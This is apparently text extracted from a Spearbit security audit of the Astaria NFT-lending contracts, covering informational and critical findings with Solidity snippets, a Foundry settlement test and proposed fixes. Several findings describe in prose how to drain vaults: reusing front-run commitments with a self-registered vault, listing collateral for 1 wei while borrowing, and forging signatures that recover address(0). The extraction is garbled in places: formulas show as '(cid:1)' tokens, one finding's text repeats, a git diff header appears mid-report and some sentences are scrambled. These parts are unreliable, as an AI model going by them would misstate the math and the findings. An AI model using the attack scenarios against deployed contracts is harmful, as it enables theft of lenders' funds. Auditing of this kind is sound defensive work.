d → newStack.lien.details.duration
L_in → newStack.lien.details.liquidationInitialAsk
Since we've already checked that a > 0, we can deduce that 0 < a ≤ a_owed. And since having 0 < a_owed ≤ L_in implies that L_in is non-zero and positive, we have that newStack.lien.details.liquidationInitialAsk == 0 implies newStack.lien.details.liquidationInitialAsk < owingAtEnd, and so the conditionals in this if statement can be simplified to: if ( newStack.lien.details.liquidationInitialAsk < owingAtEnd ) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.INVALID_LIQUIDATION_INITIAL_ASK ); }

+5.6.22 Reorganise sanity/validity checks in the commitToLien(...) flow
Severity: Informational
Context: • AstariaRouter.sol#L857-L863 • AstariaRouter.sol#L566-L587 • AstariaRouter.sol#L885-L891 • AstariaRouter.sol#L883
Description: The following checks are performed in _validateRequest(...): • params.lienRequest.amount == 0: if (params.lienRequest.amount == 0) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.AMOUNT_ZERO ); } The above check can be moved to the very beginning of the commitToLien(...) flow, perhaps right before or after we check that the commitment's provided vault is valid. • newStack.lien.details.duration < s.minLoanDuration can be checked right after we compare it to the time to the second epoch end: if (publicVault.supportsInterface(type(IPublicVault).interfaceId)) { uint256 timeToSecondEpochEnd = publicVault.timeToSecondEpochEnd(); require(timeToSecondEpochEnd > 0, "already two epochs ahead"); if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } } if (lien.details.duration < s.minLoanDuration) { revert ILienToken.InvalidLienState( ILienToken.InvalidLienStates.MIN_DURATION_NOT_MET ); } This only works if we assume the LienToken.createLien(...) endpoint does not change the duration; the current implementation does not. • block.timestamp > params.lienRequest.strategy.deadline can also be checked at the very beginning of the commitToLien flow.
Recommendation: The recommendations above can be applied, or we can keep the current flow if we would like to check these invariants at the end of the flow.

+5.6.23 Refactor fetching strategyValidator
Severity: Informational
Context: • AstariaRouter.sol#L480-L485 • AstariaRouter.sol#L492-L496
Description: Both _validateCommitment(...) and getStrategyValidator(...) need to fetch strategyValidator, and both use the same logic.
Recommendation: We can refactor and introduce a new internal function: function _getStrategyValidator( RouterStorage storage s, IAstariaRouter.Commitment calldata commitment ) internal view returns (address strategyValidator) { uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); strategyValidator = s.strategyValidators[nlrType]; if (strategyValidator == address(0)) { revert InvalidStrategy(nlrType); } } which can be used in both functions above.

+5.6.24 assembly ("memory-safe") can be used in _sliceUint
Severity: Informational
Context: • AstariaRouter.sol#L450-L459 • AstariaRouter.sol#L480 • AstariaRouter.sol#L492
Description: The following internal pure function is defined in AstariaRouter: function _sliceUint( bytes memory bs, uint256 start ) internal pure returns (uint256 x) { uint256 length = bs.length; assembly { let end := add(ONE_WORD, start) if lt(length, end) { mstore(0, OUTOFBOUND_ERROR_SELECTOR) revert(0, ONE_WORD) } x := mload(add(bs, end)) } } Since only the scratch space in memory is altered, we can use: assembly ("memory-safe") { ... } It is also only used with start = 0: uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)) 1. We can use assembly ("memory-safe") (requires solc v0.8.13): function _sliceUint( bytes memory bs, uint256 start ) internal pure returns (uint256 x) { assembly ("memory-safe") { let length := mload(bs) let end := add(ONE_WORD, start) if lt(length, end) { mstore(0, OUTOFBOUND_ERROR_SELECTOR) revert(0, ONE_WORD) } x := mload(add(bs, end)) } } 2. It might be better to move this helper/utility function to a library. 3. We can specialise for start == 0.
We can use assembly ("memory-safe") (requires solc v0.8.13): function _sliceUint( bytes memory bs, uint256 start ) internal pure returns (uint256 x) { assembly ("memory-safe") { let length := mload(bs) let end := add(ONE_WORD, start) if lt(length, end) { mstore(0, OUTOFBOUND_ERROR_SELECTOR) revert(0, ONE_WORD) } x := mload(add(bs, end)) } } 2. Might be better to move this helper/utility function to a library. 3. We can specialise for start == 0. +5.6.25 Updating the proxies and initialisation Severity: Informational Context: • AstariaRouter.sol#L83 • CollateralToken.sol#L80 • LienToken.sol#L57 Description/Recommendation: Just a note in case one would need to change some parameters after deploying v0.5.0 (if we can't file for them): cast storage $ASTARIA_ROUTER_PROXY_ADDR_MAINNET $INITIALIZER_SLOT 0x0000000000000000000000000000000000000000000000000000000000000001 then a new modifier needs to be used here or for a new init endpoint with reinitializer(2) modifier. The same goes for LienToken and CollateralToken: cast storage $LIEN_TOKEN_PROXY_ADDR $INITIALIZER_SLOT 0x0000000000000000000000000000000000000000000000000000000000000001 cast storage $COLLATERAL_TOKEN_PROXY_ADDR $INITIALIZER_SLOT 0x0000000000000000000000000000000000000000000000000000000000000001 64 +5.6.26 validateOrder(...) prevents settling multiple liquidation auctions using only one call to Seaport Severity: Informational Context: • CollateralToken.sol#L139-L144 Description/Recommendation: When a Seaport liquidation auction settles the CollateralToken gets a call back which has the following check if the offerer Is the CollateralToken: if ( zoneParameters.orderHashes[0] != s.idToUnderlying[collateralId].auctionHash ) { revert InvalidOrder(); } Just a note, this check is really important as it prevents to settle multiple liquidation auctions with just one call to Seaport. This basically requires that the first available advanced order can be the only order that CollateralToken accepts among the orders that CollateralToken is the offerer. Otherwise, one auction could steal the settlement payment from another auction. 
// file: src/test/LienTokenSettlementScenarioTest.t.sol function _createUser(uint256 pk, string memory label) internal returns(address addr) { uint256 ownerPK = uint256(pk); addr = vm.addr(ownerPK); vm.label(addr, label); } // Scenario 13: two liquidated liens are settled simultaneously on Seaport function testScenario13() public { { console2.log("--- test multiple simultaneous auction settlement ---"); address borrower1 = _createUser(0xb055033501, "borrower1"); address borrower2 = _createUser(0xb055033501, "borrower2"); address vaultOwner = _createUser(0xa77ac3, "vaultOwner"); address publicVault = _createPublicVault(vaultOwner, vaultOwner, 14 days); vm.label(publicVault, "publicVault"); console2.log("[+] public vault is created: %s", publicVault); _lendToVault( Lender({addr: vaultOwner, amountToLend: 10 ether}), payable(publicVault) ); address privateVault = _createPrivateVault(borrower2, borrower2); vm.label(privateVault, "privateVault"); console2.log("[+] private vault is created: %s", privateVault); _lendToPrivateVault( PrivateLender({addr: borrower2, amountToLend: 1 ether, token: address(WETH9)}), payable(privateVault) ); TestNFT nft1 = new TestNFT(1); address tokenContract1 = address(nft1); uint256 tokenId1 = uint256(0); TestNFT nft2 = new TestNFT(1); address tokenContract2 = address(nft2); uint256 tokenId2 = uint256(0); nft1.transferFrom(address(this), borrower1, tokenId1); nft2.transferFrom(address(this), borrower2, tokenId2); ILienToken.Stack[2] memory stacks; vm.startPrank(borrower1); (, stacks[1]) = _commitToLien({ vault: payable(publicVault), strategist: vaultOwner, strategistPK: 0xa77ac3, tokenContract: tokenContract1, tokenId: tokenId1, lienDetails: ILienToken.Details({ maxAmount: 2 ether, rate: 1e8, duration: 1e10, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 0.5 ether, revertMessage: "" }); vm.stopPrank(); vm.startPrank(borrower2); (, stacks[0]) = _commitToLien({ vault: payable(privateVault), strategist: borrower2, strategistPK: 0xb055033501, tokenContract: tokenContract2, tokenId: tokenId2, lienDetails: ILienToken.Details({ maxAmount: 1 ether, rate: 2e8, duration: 1e10, maxPotentialDebt: 0 ether, liquidationInitialAsk: 3 ether }), amount: 1 ether, revertMessage: "" }); skip(1e10); OrderParameters[2] memory listedOrders; listedOrders[0] = _liquidate(stacks[0]); listedOrders[1] = _liquidate(stacks[1]); skip(uint256(3 days) / 4000); vm.stopPrank(); uint256 _bidderPK = 0xb1dde5; address _bidder = _createUser(_bidderPK, "bidder"); _bid2(Bidder({ bidder: _bidder, bidderPK: _bidderPK }), listedOrders, 10 ether, stacks); } } function _bid2( Bidder memory incomingBidder, OrderParameters[2] memory params, uint256 bidAmount, ILienToken.Stack[2] memory stack ) internal returns (uint256 executionPrice) { vm.deal(incomingBidder.bidder, bidAmount * 3); if (bidderConduits[incomingBidder.bidder].conduitKey == bytes32(0)) { _deployBidderConduit(incomingBidder.bidder); } vm.startPrank(incomingBidder.bidder); AdvancedOrder[] memory orders = new AdvancedOrder[](4); { WETH9.deposit{value: bidAmount * 2}(); WETH9.approve(bidderConduits[incomingBidder.bidder].conduit, bidAmount * 2); OrderParameters[] memory mirrors = new OrderParameters[](2); OrderComponents[] memory matchOrderComponents = new OrderComponents[](2); mirrors[0] = _createMirrorOrderParameters( params[0], payable(incomingBidder.bidder), params[0].zone, bidderConduits[incomingBidder.bidder].conduitKey ); emit log_order(mirrors[0]); mirrors[1] = _createMirrorOrderParameters( params[1],
payable(incomingBidder.bidder), params[1].zone, bidderConduits[incomingBidder.bidder].conduitKey ); emit log_order(mirrors[1]); orders[0] = AdvancedOrder(params[0], 1, 1, new bytes(0), abi.encode(stack[0])); matchOrderComponents[0] = getOrderComponents( mirrors[0], consideration.getCounter(incomingBidder.bidder) ); bytes memory mirrorSignature = signOrder( SEAPORT, incomingBidder.bidderPK, consideration.getOrderHash(matchOrderComponents[0]) ); orders[1] = AdvancedOrder(mirrors[0], 1, 1, mirrorSignature, new bytes(0)); orders[2] = AdvancedOrder(params[1], 1, 1, new bytes(0), abi.encode(stack[1])); matchOrderComponents[1] = getOrderComponents( mirrors[1], consideration.getCounter(incomingBidder.bidder) ); mirrorSignature = signOrder( SEAPORT, incomingBidder.bidderPK, consideration.getOrderHash(matchOrderComponents[1]) ); orders[3] = AdvancedOrder(mirrors[1], 1, 1, mirrorSignature, new bytes(0)); } Fulfillment[] memory _fulfillments = new Fulfillment[](4); { FulfillmentComponent[][4] memory fc; fc[0] = new FulfillmentComponent[](1); fc[1] = new FulfillmentComponent[](1); fc[2] = new FulfillmentComponent[](1); fc[3] = new FulfillmentComponent[](1); fc[0][0] = FulfillmentComponent(0, 0); fc[1][0] = FulfillmentComponent(1, 0); fc[2][0] = FulfillmentComponent(2, 0); fc[3][0] = FulfillmentComponent(3, 0); _fulfillments[0] = Fulfillment(fc[0], fc[1]); _fulfillments[1] = Fulfillment(fc[1], fc[0]); _fulfillments[2] = Fulfillment(fc[2], fc[3]); _fulfillments[3] = Fulfillment(fc[3], fc[2]); } consideration.matchAdvancedOrders( orders, new CriteriaResolver[](0), _fulfillments, incomingBidder.bidder ); vm.stopPrank(); }

+5.6.27 The stack provided as extra data to settle Seaport auctions needs to be retrievable
Severity: Informational
Context: • CollateralToken.sol#L145-L148
Description: The stack provided as extra data to settle Seaport auctions needs to be retrievable. Perhaps one can figure it out from various events or off-chain agents, but it is not directly retrievable.
Recommendation: Make sure there are systems in place to retrieve the stack associated with a liquidated Seaport auction, so that fulfillers can provide it as extra data when they would like to settle these auctions.
Astaria: It's available from new loan events or the Astaria backend.
+5.6.28 Make sure CollateralToken is connected to Seaport v1.5
Severity: Informational
Context: • CollateralToken.sol#L84 • CollateralToken.sol#L343-L365
Description: Currently the CollateralToken proxy (v0) is connected to Seaport v1.1, which has different callbacks to the zone and also only performs static calls. If the current version of CollateralToken gets connected to Seaport v1.1, no one would be able to settle auctions created by the CollateralToken. This is due to the fact that the callbacks would revert.
Recommendation: Make sure CollateralToken is connected to Seaport v1.5.

+5.6.29 In liquidatorNFTClaim move liquidator's definition closer to its first usage site
Severity: Informational
Context: • CollateralToken.sol#L243-L280
Description/Recommendation: For better readability it would be best to move liquidator's definition closer to its first usage site in liquidatorNFTClaim: function liquidatorNFTClaim( ILienToken.Stack memory stack, OrderParameters memory params, uint256 counterAtLiquidation ) external whenNotPaused { CollateralStorage storage s = _loadCollateralSlot(); uint256 collateralId = params.offer[0].token.computeId( params.offer[0].identifierOrCriteria ); ... // the sanity checks ... s.LIEN_TOKEN.makePayment(stack); address liquidator = s.LIEN_TOKEN.getAuctionLiquidator(collateralId); // <-- moved down here _releaseToAddress(s, collateralId, liquidator); } It would also be best to define a new endpoint for LienToken to combine the two calls LIEN_TOKEN.makePayment(...) and LIEN_TOKEN.getAuctionLiquidator(...) into one call in this flow.

+5.6.30 Define getter for idToUnderlying.auctionHash
Severity: Informational
Context: • CollateralToken.sol#L428-L435 • ICollateralToken.sol#L50 • ICollateralToken.sol#L62
Description/Recommendation: It might be useful to define a getter function/endpoint for idToUnderlying.auctionHash.
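A sketch of such a getter (the endpoint name is hypothetical; the storage access mirrors liquidatorNFTClaim above):

function getAuctionHash(uint256 collateralId) external view returns (bytes32) {
    CollateralStorage storage s = _loadCollateralSlot();
    return s.idToUnderlying[collateralId].auctionHash;
}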
+5.6.31 Remove unused code
Severity: Informational
Context: • ILienToken.sol#L23-L32 • LienToken.sol#L30 • LienToken.sol#L32 • LienToken.sol#L38 • LienToken.sol#L44 • ClaimFees.sol • V3SecurityHook.sol • CollateralToken.sol#L42-L56 • CollateralToken.sol#L57-L60 • IFlashAction.sol • ISecurityHook.sol • IPublicVault.sol#L35 • IPublicVault.sol#L116 • IAstariaRouter.sol#L101-L104 • IV3PositionManager.sol#L3 • ILienToken.sol#L27-L31 • IAstariaRouter.sol#L36 • IAstariaRouter.sol#L96 • ILienToken.sol#L57
Description/Recommendation:
• ILienToken.sol#L23-L32, the FileType enum has only two fields that are used; we can update it to: enum FileType { NotSupported, // we can keep `NotSupported` if we would like the actual file types to start from 1 CollateralToken, AstariaRouter }
• LienToken.sol#L30, IVaultImplementation can be removed since it's not used.
• LienToken.sol#L32, VaultImplementation can be removed since it's not used.
• LienToken.sol#L38, LienToken.sol#L44, AmountDeriver is not used and can be removed.
• ClaimFees.sol, V3SecurityHook.sol, flashAction has been removed from the CollateralToken. Perhaps these files can be removed or marked as not being used currently. function flashAction( IFlashAction receiver, uint256 collateralId, bytes calldata data ) external onlyOwner(collateralId) { address addr; uint256 tokenId; CollateralStorage storage s = _loadCollateralSlot(); (addr, tokenId) = getUnderlying(collateralId); if (!s.flashEnabled[addr]) { revert InvalidCollateralState(InvalidCollateralStates.FLASH_DISABLED); } if ( s.LIEN_TOKEN.getCollateralState(collateralId) == bytes32("ACTIVE_AUCTION") ) { revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } bytes32 preTransferState; // look to see if we have a security handler for this asset address securityHook = s.securityHooks[addr]; if (securityHook != address(0)) { preTransferState = ISecurityHook(securityHook).getState(addr, tokenId); } // transfer the NFT to the destination optimistically ClearingHouse(s.idToUnderlying[collateralId].clearingHouse) .transferUnderlying(addr, tokenId, address(receiver)); // trigger the flash action on the receiver if ( receiver.onFlashAction( IFlashAction.Underlying( s.idToUnderlying[collateralId].clearingHouse, addr, tokenId ), data ) != keccak256("FlashAction.onFlashAction") ) { revert FlashActionCallbackFailed(); } if ( securityHook != address(0) && preTransferState != ISecurityHook(securityHook).getState(addr, tokenId) ) { revert FlashActionSecurityCheckFailed(); } // validate that the NFT returned after the call if ( IERC721(addr).ownerOf(tokenId) != address(s.idToUnderlying[collateralId].clearingHouse) ) { revert FlashActionNFTNotReturned(); } }
• CollateralToken.sol#L42-L56, AdvancedOrder, CriteriaResolver, SpentItem and ReceivedItem are not used.
• CollateralToken.sol#L57-L60, Consideration and SeaportInterface are not used.
• IFlashAction.sol, flash action has been removed from the CollateralToken. Perhaps this file can be removed or commented that it is not used currently.
• ISecurityHook.sol, this was also used for flash actions in CollateralToken. Perhaps it can be removed or marked as not used.
• IPublicVault.sol#L35, VaultData.strategistUnclaimedShares is not used.
• IPublicVault.sol#L116, LIQUIDATION_ACCOUNTANT_ALREADY_DEPLOYED_FOR_EPOCH is not used.
• IAstariaRouter.sol#L101-L104, MerkleData is not used anymore.
• IV3PositionManager.sol#L3, not used anymore due to the removal of flash action from CollateralToken.
• ILienToken.sol#L27-L31, these fields are not used anymore here, and MinLoanDuration is redefined in IAstariaRouter.
• IAstariaRouter.sol#L36, MinInterestRate is not used.
• IAstariaRouter.sol#L96, StrategyDetailsParam.version seems not to be used, perhaps because we have another version encoded in NewLienRequest.nlrDetails which might point to the same information. Consider removing it if there isn't a plan to use it to encapsulate a different version.
• ILienToken.sol#L57, maxPotentialDebt is not used anymore. Some tests still set this value to a non-zero value.

+5.6.32 Use _underscore for internal function names
Severity: Informational
Context: • WithdrawProxy.sol#L374
Description/Recommendation: In the context above, it would be best to start the function names with an underscore _ for better readability.

+5.6.33 Fix Comments
Severity: Informational
Context: • WithdrawProxy.sol#L368-L372 • WithdrawProxy.sol#L58 • WithdrawProxy.sol#L56 • WithdrawProxy.sol#L304 • LienToken.sol#L273-L276 • AuthInitializable.sol#L19 • AuthInitializable.sol#L20 • AstariaRouter.sol#L535-L536 • WithdrawProxy.sol#L247 • AstariaVaultBase.sol#L47
Description/Recommendation:
• WithdrawProxy.sol#L368-L372, handleNewLiquidation(...) is not directly called anymore; it is called indirectly when a safe ERC721 transfer calls back the onERC721Received endpoint.
• WithdrawProxy.sol#L58, withdrawReserveReceived's comment mentions WETH, but in general the asset might be a different token. It also receives assets from the next epoch's WithdrawProxy.
• WithdrawProxy.sol#L56, the comment is not accurate for expected, as part of it might be drained to the previous WithdrawProxy.
• WithdrawProxy.sol#L304, needs to mention that ... is always increased by the transfer amount from the PublicVault or the next epoch's WithdrawProxy.
• LienToken.sol#L273-L276, the NatSpec comment needs to be updated as it's not correct in the current protocol:
- * @notice Retrieves a lienCount for specific collateral
- * @param collateralId the Lien to compute a point for
+ * @notice Retrieves the ID of the LienToken associated to this collateralId
+ * @param collateralId The ID of the CollateralToken.
• AuthInitializable.sol#L19, the link is broken.
• AuthInitializable.sol#L20, the link needs to be updated to https://github.com/transmissions11/solmate/blob/v7/src/auth/Auth.sol.
• AstariaRouter.sol#L535-L536, the NatSpec comment needs to be updated as it's not correct in the current protocol:
- * @notice Deposits collateral and requests loans for multiple NFTs at once.
- * @param commitment The commitment proofs and requested loan data for each loan.
+ * @notice Deposits collateral and requests a loan for an NFT.
+ * @param commitment The commitment proof and requested loan data.
• WithdrawProxy.sol#L247, typo:
- * @notice returns the final auctio nend
+ * @notice returns the final auction end
• AstariaVaultBase.sol#L47, the comment should say 61.
diff --git a/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review.txt new file mode 100644 index 0000000..a492ece --- /dev/null +++ b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review.txt @@ -0,0 +1,183 @@
+5.1.1 LienToken.transferFrom does not update a public vault's bookkeeping parameters when a lien is transferred to it.
Severity: Critical Risk
Context: LienToken.sol#L303
Description: When transferFrom is called, there is no check whether the from or to parameters could be a public vault. Currently, there is no mechanism for public vaults to transfer their liens. But private vault owners, who are also the owners of the vault's lien tokens, can call transferFrom and transfer their liens to a public vault. In this case, we would need to make sure to update the bookkeeping for the public vault that the lien was transferred to. On the LienToken side, s.LienMeta[id].payee needs to be set to the address of the public vault. And on the PublicVault side, the yIntercept, slope, last, and epochData of VaultData need to be updated (this requires knowing the lien's end). However, private vaults do not keep a record of these values; the corresponding values are only saved in stacks off-chain and validated on-chain using their hash.
Recommendation: • Either block transferring liens to public vaults, or • Private vaults or the LienToken would need to have more storage parameters that keep a record of some values for each lien, so that when the time comes to transfer a lien to a public vault, the parameters mentioned in the Description can be updated for the public vault.
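A sketch of the first option (a hypothetical override; a production fix would need a more robust vault check): reject lien transfers whose recipient identifies as a public vault, since its yIntercept/slope/epochData bookkeeping cannot be updated here:

function transferFrom(address from, address to, uint256 id) public override {
    // Sketch only: a recipient without code or without ERC165 support would
    // make this staticcall revert, so a real implementation would need a
    // try/catch or a registry lookup on the router instead.
    if (
        to.code.length > 0 &&
        IERC165(to).supportsInterface(type(IPublicVault).interfaceId)
    ) {
        revert("lien transfer to public vault blocked");
    }
    super.transferFrom(from, to, id);
}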
+5.1.2 Anyone can take a valid commitment combined with a self-registered private vault to steal funds from any vault without owning any collateral
Severity: Critical Risk
Context: VaultImplementation.sol#L279, VaultImplementation.sol#L227
Description: The issue stems from the following check in VaultImplementation._validateCommitment(params, receiver): if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) // <-- the problematic condition ) { ... In this if block, if receiver is a valid vault the body of the if is skipped. A valid vault is one that has been registered in AstariaRouter using newVault or newPublicVault. So, for example, any private vault supplied as a receiver would be allowed here, and the call to _validateCommitment will continue without reverting, at least in this if block. If we backtrack the function calls to _validateCommitment, we arrive at 3 exposed endpoints: • commitToLiens • buyoutLien • commitToLien A call to commitToLiens will end up having the receiver be the AstariaRouter. A call to buyoutLien will set the receiver as the recipient() for the vault, which is either the vault itself for public vaults or the owner for private vaults. So we are only left with commitToLien, where the caller can set the value for the receiver directly. A call to commitToLien will initiate a series of function calls, and so receiver is only supplied to _validateCommitment to check whether it is allowed to be used, and finally when transferring (safeTransfer) wETH. This opens up exploiting scenarios where an attacker: 1. Creates a new private vault by calling newVault, let's call it V. 2. Takes a valid commitment C, combines it with V, and supplies those to commitToLien. 3. Calls the withdraw endpoint of V to withdraw all the funds. For step 2, the attacker can source valid commitments by doing either of the following: 1. Frontrun calls to commitToLiens, take all the commitments C_0, ..., C_n, and supply them one by one along with V to the commitToLien endpoint of the vault that was specified by each C_i. 2. Frontrun calls to the commitToLien endpoints of vaults, take their commitment C, and combine it with V to send to commitToLien. 3. Backrun either of the scenarios from the above points and create a new commitment with a new lien request that tries to max out the potential debt for a collateral while also keeping the other inequalities valid (for example, the inequality regarding liquidationInitialAsk).
Recommendation: If the commitToLien endpoint is only supposed to be called by AstariaRouter, make sure to apply that restriction. Or, if it is allowed to be called by anyone, the !ROUTER().isValidVault(receiver) condition would need to be modified. As an example, one can use commitment.lienRequest.strategy.vault (let's call it Vs) and make sure that when ROUTER().isValidVault(receiver) is true then R = Vs (where R is the receiver; note some parameters might be redundant in this case). We would also need to take into consideration that either the vault owners or delegates also sign Vs, or that the strategy validators take this value into consideration when validateAndParse is called. This 2nd recommendation might interfere with what commitment.lienRequest.strategy.vault would need to represent in other places (the vault that the amount is borrowed from, not sent to).

+5.1.3 Collateral owner can steal funds by taking liens while asset is listed for sale on Seaport
Severity: Critical Risk
Context: LienToken.sol#L368-372
Description: We only allow collateral holders to call listForSaleOnSeaport if they are listing the collateral at a price that is sufficient to pay back all of the liens on their collateral. When a new lien is created, we check that collateralStateHash != bytes32("ACTIVE_AUCTION") to ensure that the collateral is able to accept a new lien. However, calling listForSaleOnSeaport does not set the collateralStateHash, so it doesn't stop us from taking new liens. As a result, a user can deposit collateral and then, in one transaction: • List the asset for sale on Seaport for 1 wei. • Take the maximum possible loans against the asset. • Buy the asset on Seaport for 1 wei. The 1 wei will not be sufficient to pay back the lenders, and the user will be left with the collateral as well as the loans (minus 1 wei).
Recommendation: Either set the collateralStateHash when an item is listed for sale on Seaport, or check the s.collateralIdToAuction variable before allowing a lien to be taken.
Astaria: listForSaleOnSeaport has been removed in the following PR and that resolves the issue: PR 206.
Spearbit: Verified.
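A sketch of the second suggested check (the helper name and revert message are hypothetical; s.collateralIdToAuction is the variable named in the recommendation, assumed reachable from the lien-creation flow), to be called before a new lien is created:

function _requireNoActiveListing(
    LienStorage storage s,
    uint256 collateralId
) internal view {
    // refuse new liens while the collateral has a live Seaport listing/auction
    if (s.collateralIdToAuction[collateralId] != bytes32(0)) {
        revert("collateral is listed on Seaport");
    }
}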
Examples of vulnerable endpoints are: • createLien: If we create the first lien but pass a stack with other liens, those liens will automatically be included in the stack going forward, which means that the collateral holder will owe money they didn't receive. • makePayment: If we make a payment on behalf of a collateral with no liens, but include a stack with many liens (all owed to me), the result will be that the collateral will be left with the remaining liens continuing to be owed • buyoutLien: Anyone can call buyoutLien(...) and provide parameters that are spoofed but satisfy some constraints so that the call would not revert. This is currently possible due to the issue in this context. As a consequence the caller can – _mint any unminted liens which can DoS the system. – _burn lienIds that they don't have the right to remove. – manipulate any public vault's storage (if it has been set as a payee for a lien) through its handleBuyout- Lien. It seems like this endpoint might have been meant to be a restricted endpoint that only registered vaults can call into. And the caller/user is supposed to only call into here from VaultImplementa- tion.buyoutLien. Recommendation: modifier validateStack(uint256 collateralId, Stack[] memory stack) { + + + LienStorage storage s = _loadLienStorageSlot(); bytes32 stateHash = s.collateralStateHash[collateralId]; if (stateHash == bytes32(0) && stack.length != 0) { revert InvalidState(InvalidStates.EMPTY_STATE); } if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } _; } This will also require adding the InvalidStates.EMPTY_STATE to the enum. Astaria: PR 194. Spearbit: Confirmed that this is fixed in the following PR 194. 10 +5.1.5 A borrower can list their collateral on Seaport and receive almost all the listing price without paying back their liens Severity: Critical Risk Context: LienToken.sol#L480 Description: When the collateral s.auctionData is not populated and thus, function gets called since stack.length is 0, this loop will not run and no payment is sent to the lending vaults. The rest of the payment is sent to the borrower. And the collateral token and its related data gets burnt/deleted by calling settleAuction. The lien tokens and the vaults remain untouched as though nothing has happened. is listed on SeaPort by the borrower using listForSaleOnSeaport, if that order gets fulfilled/matched and ClearingHouse's fallback So basically a borrower can: 1. Take/borrow liens by offering a collateral. 2. List their collateral on SeaPort through the listForSaleOnSeaport endpoint. 3. Once/if the SeaPort order fulfills/matches, the borrower would be paid the listing price minus the amount sent to the liquidator (address(0) in this case, which should be corrected). 4. Collateral token/data gets burnt/deleted. 5. Lien token data remains and the loans are not paid back to the vaults. And so the borrower could end up with all the loans they have taken plus the listing price from the SeaPort order. Note that when a user lists their own collateral on Seaport, it seems that we intentionally do not kick off the auction process: • Liens are continued. • Collateral state hash is unchanged. • liquidator isn't set. • Vaults aren't updated. • Withdraw proxies aren't set, etc. Related issue 88. Recommendation: Be careful and also pay attention that listing by a borrower versus auctioning by a liquidator take separate return/payback paths. 
It is recommended to separate the listing and liquidating logic and make sure auction funds and distributed appropriately. Most importantly, the auction stack must be set. Astaria: We've removed the ability for self-listing on seaport as the fix for v0, will add this feature this in a future release. Spearbit: Fixed in the following PR by removing the listForSaleOnSeaport endpoint PR 206. +5.1.6 Phony signatures can be used to forge any strategy Severity: Critical Risk Context: VaultImplementation.sol#L249 Description: In _validateCommitment(), we check that the merkle root of the strategy has been signed by the strategist or delegate. After the signer is recovered, the following check is performed to validate the signature: recovered != owner() && recovered != s.delegate && recovered != address(0) 11 This check seems to be miswritten, so that any time recovered == address(0), the check passes. When ecrecover is used to check the signed data, it returns address(0) in the situation that a phony signature is submitted. See this example for how this can be done. The result is that any borrower can pass in any merkle root they'd like, sign it in a way that causes address(0) to return from ecrecover, and have their commitment validated. Recommendation: if ( - + recovered != owner() && recovered != s.delegate && recovered != address(0) (recovered != owner() && recovered != s.delegate) || recovered == address(0) ) { revert IVaultImplementation.InvalidRequest( InvalidRequestReason.INVALID_SIGNATURE ); } Astaria: Fixed in PR 209. Spearbit: Verified. 5.2 High Risk +5.2.1 Inequalities involving liquidationInitialAsk and potentialDebt can be broken when buyoutLien is called Severity: High Risk Context: • LienToken.sol#L102 • VaultImplementation.sol#L305 • LienToken.sol#L377-L378 • LienToken.sol#L427 • AstariaRouter.sol#L542 Description: When we commit to a new lien, the following gets checked to be true for all j 2 0, (cid:1) (cid:1) (cid:1) , n (cid:0) 1: onew + on(cid:0)1 + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj where: parameter description oi onew n Li L0 k k A0 k _getOwed(newStack[i], newStack[i].point.end) _getOwed(newSlot, newSlot.point.end) stack.length newStack[i].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk params.position params.encumber.amount 12 so in a stack in general we should have the: But when an old lien is replaced with a new one, we only perform the following checks for L0 k : (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj 0 0 0 k ^ L k (cid:21) A L k > 0 And thus we can introduce: • L0 • o0 k (cid:28) Lk or k (cid:29) ok (by pushing the lien duration) which would break the inequality regarding oi s and Li . If the inequality is broken, for example, if we buy out the first lien in the stack, then if the lien expires and goes into a Seaport auction the auction's starting price L0 would not be able to cover all the potential debts even at the beginning of the auction. Recommendation: When buyoutLien is called, we would need to loop over j and check the inequalities again: +5.2.2 VaultImplementation.buyoutLien can be DoSed by calls to LienToken.buyoutLien (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj Severity: High Risk Context: • LienToken.sol#L102 • LienToken.sol#L121 • VaultImplementation.sol#L305 Description: Anyone can call into LienToken.buyoutLien and provide params of the type LienActionBuyout: params.incoming is not used, so for example vault signatures or strategy validation is skipped. There are a few checks for params.encumber. 
Let's define the following variables:

  $i$           : params.position
  $k_j$         : params.encumber.stack[j].point.position
  $t_j$         : params.encumber.stack[j].point.last
  $e_j$         : params.encumber.stack[j].point.end
  $e'_i$        : $t_{now} + D'_i$
  $l_j$         : params.encumber.stack[j].point.lienId
  $l'_i$        : $h(N'_i, V'_i, S'_i, c'_i, (A'^{max}_i, r'_i, D'_i, P'_i, L'_i))$ where $h$ is the keccak256 of the encoding
  $r_j$         : params.encumber.stack[j].lien.details.rate (old rate)
  $r'_i$        : params.encumber.lien.details.rate (new rate)
  $c$           : params.encumber.collateralId
  $c_j$         : params.encumber.stack[j].lien.collateralId
  $c'_i$        : params.encumber.lien.collateralId
  $A_j$         : params.encumber.stack[j].point.amount
  $A'_i$        : params.encumber.amount
  $A^{max}_j$   : params.encumber.stack[j].lien.details.maxAmount
  $A'^{max}_i$  : params.encumber.lien.details.maxAmount
  $R$           : params.encumber.receiver
  $N_j$         : params.encumber.stack[j].lien.token
  $N'_i$        : params.encumber.lien.token
  $V_j$         : params.encumber.stack[j].lien.vault
  $V'_i$        : params.encumber.lien.vault
  $S_j$         : params.encumber.stack[j].lien.strategyRoot
  $S'_i$        : params.encumber.lien.strategyRoot
  $D_j$         : params.encumber.stack[j].lien.details.duration
  $D'_i$        : params.encumber.lien.details.duration
  $P_j$         : params.encumber.stack[j].lien.details.maxPotentialDebt
  $P'_i$        : params.encumber.lien.details.maxPotentialDebt
  $L_j$         : params.encumber.stack[j].lien.details.liquidationInitialAsk
